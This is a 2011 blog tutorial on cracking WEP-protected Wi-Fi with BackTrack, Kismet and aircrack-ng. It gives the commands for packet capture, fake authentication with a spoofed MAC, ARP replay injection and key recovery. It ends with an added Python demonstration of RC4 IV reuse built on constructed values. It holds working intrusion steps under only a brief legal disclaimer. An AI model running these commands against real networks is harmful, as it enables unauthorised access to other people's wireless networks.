Thursday 27 October 2011

WEP Cracking

A. SCOPE
 
This tutorial is intended for users with little or no experience with Linux or Wi-Fi. It aims to guide you through the process of using these tools effectively.
 
B. OVERVIEW
 
BACKTRACK is a bootable live CD with a myriad of wireless and TCP/IP networking tools. This tutorial will only cover the included Kismet and aircrack-ng suite of tools.
 
Tools Overview
  • Kismet – a wireless network detector and packet sniffer
  • airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
  • airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
  • aireplay – a tool for forging and replaying ARP requests
  • aircrack – a tool for recovering WEP keys from captured packets
  • iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode, which is essential for sending fake ARP requests to the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address
 
Glossary of Terms
  • AP: Access Point: a wireless router
  • MAC Address: Media Access Control address, a unique ID assigned to wireless adapters and routers. It comes in hexadecimal format (e.g. 00:11:ef:22:a3:6a)
  • BSSID: the Access Point’s MAC address
  • ESSID: the Access Point’s broadcast name (e.g. linksys, default, belkin). Some APs will not broadcast their name, but Kismet may be able to detect it anyway
  • TERMINAL: MS-DOS-like command line interface. You can open this by clicking the black box icon next to the start key in BackTrack
  • WEP: short for Wired Equivalent Privacy, a security protocol for Wi-Fi networks
  • WPA: short for Wi-Fi Protected Access, a more secure protocol than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption

Since BackTrack is a live CD running off your CD-ROM, there is nowhere that you can write files to unless you have a Linux partition on your hard drive or a USB storage device. BackTrack has some NTFS support, so you will be able to browse to your Windows-based hard drive should you have one, but it will mount the partition as “read-only”. I dual boot Windows and Ubuntu on my laptop, so I already have a Linux swap partition and a ReiserFS partition. BackTrack had no problem detecting these and mounting them for me. To find your hard drive or USB storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately, hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.
 
C. DISCLAIMER
Hacking into someone’s wireless network without permission is probably against the law. I wouldn’t recommend doing it. I didn’t break into anyone else’s network while learning how to do this.
 
STEP 1:
Monitoring Wireless Traffic With Kismet (for putting wlan0 in monitor mode)
Once KDE is up and running, start Kismet by clicking on the start key and browsing to Backtrack -> Wireless Tools -> Analyzers -> Kismet.
Specify the wireless interface, e.g. wlan0.
Note the following in a text editor:
  • broadcast name (ESSID), also called SSID; in our case it is ITMIS
  • MAC address (BSSID); this is the MAC of the AP’s radio interface
  • channel number
Leave Kismet running to leave your wireless adapter in monitor mode.
 
STEP 2
Collecting Data With Airodump
airodump-ng --ivs -w /root/Desktop/ITMIS_RCU wlan0
 
STEP 3
Associate your wireless card with the AP you are accessing.
aireplay-ng -1 0 -e ITMIS -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 wlan0
-a: MAC of the AP (BSSID)
-h: MAC of wlan0 (your laptop’s wireless adapter)
 
STEP 4
Start packet injection with aireplay
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 wlan0
 
STEP 5
Decrypting the WEP Key with Aircrack
Find the location of the captured IVS file you specified in step 2 (airodump-ng appends a sequence number to the prefix, so it will be named something like /root/Desktop/ITMIS_RCU-01.ivs). Then type in a terminal:
aircrack-ng -s /root/Desktop/ITMIS_RCU-01.ivs
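An added illustration (my own code, not part of the tutorial above or of the aircrack-ng project) of why the steps above revolve around collecting IVs: WEP keys RC4 with a 24-bit IV prepended to the shared key, so the IV space is tiny and any two frames sent under the same IV leak the XOR of their plaintexts to anyone listening, no key needed. The key, IV and frame contents are constructed values, and the CRC-32 ICV that real WEP appends is left out.

```python
import math
from typing import Optional

def rc4(key: bytes, length: int) -> bytes:
    """Return `length` bytes of RC4 keystream for `key` (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV sent in the clear, then data XOR RC4(IV || root key)."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    keystream = rc4(iv + root_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, keystream))

def wep_decrypt(root_key: bytes, frame: bytes) -> bytes:
    """Inverse of wep_encrypt: regenerate the same keystream from the cleartext IV."""
    iv, body = frame[:3], frame[3:]
    keystream = rc4(iv + root_key, len(body))
    return bytes(c ^ k for c, k in zip(body, keystream))

def plaintext_xor_from_iv_collision(frame_a: bytes, frame_b: bytes) -> Optional[bytes]:
    """Two frames under the same IV share a keystream, so C_a XOR C_b == P_a XOR P_b.
    A passive observer learns that relation without knowing the key."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return bytes(a ^ b for a, b in zip(frame_a[3:], frame_b[3:]))

def expected_frames_until_iv_repeat() -> float:
    """Birthday bound on the 2^24 IV space: a repeat is expected after ~sqrt(pi/2 * 2^24) frames."""
    return math.sqrt(math.pi / 2 * 2 ** 24)

if __name__ == "__main__":
    key = bytes.fromhex("0102030405")          # constructed 40-bit WEP key
    iv = bytes.fromhex("aabbcc")               # constructed IV reused by the AP
    a = wep_encrypt(key, iv, b"ARP request 0")
    b = wep_encrypt(key, iv, b"ARP request 1")
    print(plaintext_xor_from_iv_collision(a, b).hex())
    print(round(expected_frames_until_iv_repeat()))
```

The birthday bound is why ARP replay in step 4 matters to the attack: a busy AP hands out repeated IVs after only a few thousand frames, and the fixed layout of ARP packets makes the leaked XOR directly useful, which is the weakness that WPA was designed to close.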
